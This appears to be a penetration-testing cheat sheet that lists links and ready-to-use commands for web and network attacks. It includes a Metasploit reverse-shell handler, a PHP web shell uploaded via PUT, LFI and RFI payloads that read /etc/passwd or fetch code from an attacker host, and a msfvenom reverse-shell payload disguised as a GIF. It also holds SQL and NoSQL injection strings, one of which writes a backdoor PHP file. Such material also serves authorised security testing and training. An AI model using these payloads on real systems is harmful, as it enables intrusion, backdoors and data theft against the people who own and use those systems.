Finding Exploits
Search Exploit-DB
Copy Kali> searchsploit windows 2003 | grep -i local To quickly view the exploit
Copy Kali> searchsploit -x ######.py Search Google
Copy Google> site:exploit-db.com exploit kernel <= 3 Search Metasploit
Copy Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* Search Vulners
Vulners Audit
Compiling Exploits
Compile for Windows
Copy Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe Compile for Architectures
Copy Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit) Catching Exploits
Copy msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run Breaking out of Virtualization
Breaking into the Data Centre
VENOM Vulnerability
WebSockets
Hacking with WebSockets HTML5
IPV6
Penetration testing with IPv6
How to pwn things with IPv6
HTTP
Resources
OWASP AppSec Videos
OWASP Testing Guide
Cracking the Lens: Attacking HTTPs hidden attack surface
How I hacked hundreds of companies through their helpdesk
Find what request methods the web server supports
Add the following into your Burp repeater
Copy OPTIONS * HTTP/1.1
... Send fake IP
Copy Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET Webshells
PHP CMD Shell
Place in body of a PUT request and give it a file name
Copy PUT /directory/shell.php HTTP/1.1
...
<body>
<?php
Echo exec($_GET[cmd]);
?> Usage:
http://victim/directory/shell.php?cmd=whoami
Resources
XXE
Resources
Exploitation: XML External Entity (XXE) Injection
Exploiting a Real-World XXE Vulnerability
Exploiting XXE Vulnerabilities in file parsing
XSS
Resources
XSS Attack: Busting browsers to root
DOM Clobbering
DOM Flow - Untangling the DOM
CORS
Resources
Exploiting Misconfigured CORS
CSRF
Resources
Computerphile: Cross Site Request Forgery
Updating Anti-CSRF Tokens with BurpSuite
SSRF
Resources
What is Server side Request Forgery?
A New Era of SSRF
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)
Example
Sometimes what appears to be RFI can lead to SSRF, here are some commands to help
Copy # Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ
# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ RCE
Resources
Node.js Remote Code Execution as a Service
Exploiting Python code execution in the web
Big List of Naughty Strings
PHP Generic Gadget Chains
Utilizing Code Re-use or ROP in PHP Exploits
Pwning PHP Mail Function for fun and RCE
Server Side Template Injection
Resources
Server Side Template Injection
Server Side Template Injection: RCE for the Modern WebApp
API
Resources
Cracking & Fixing REST APIs
LFI
Resources
Local File Inclusion Testing Techniques
Insecure PHP Functions & their Exploits (LFI/RFI)
LFI and RFI -- The Website Security Vulnerability
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts
Examples
Copy file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
send post data
expect://whoami Open Redirects
Resources
Open URL Redirects
RFI
Copy Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt Padding Oracle Attack
Resources
Automated Padding Oracle Attacks with Padbuster
Arguments
Copy url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt Examples
Copy Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8
-cookies "ENC-COOKIE"
-plaintext '{"user":"admin","role":"admin"}' AWS
Resources
AWS PENETRATION TESTING PART 1. S3 BUCKETS
File Upload
Make a backdoor GIF
Copy # As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo “FFD8FFEo” | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif Upload From CLI
Copy Kali> curl -X POST
-F "field1=test"
-F "file=@/home/user/evil.gif"
http://$TARGET/upload.php
--cookie "cookie" E-Mail
Resources
How to Bypass E-Mail gateways using common payloads
iSCSI
Resources
An interesting route to domain admin via ISCSI
Databases
MySQL
Resources
SQL Injection
SQLMap tricks for advanced SQL injeciton
Examples
Copy username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php' MSSQL
Resources
PenTest & Hack MSSQL
SQL Injection Cheatsheet MSSQL
MongoDB
Resources
NoSQL Map
Examples
Copy true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); PBX
Resources
Pentesting VOIP
Introduction to Telephony and PBX
Examples
Copy Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET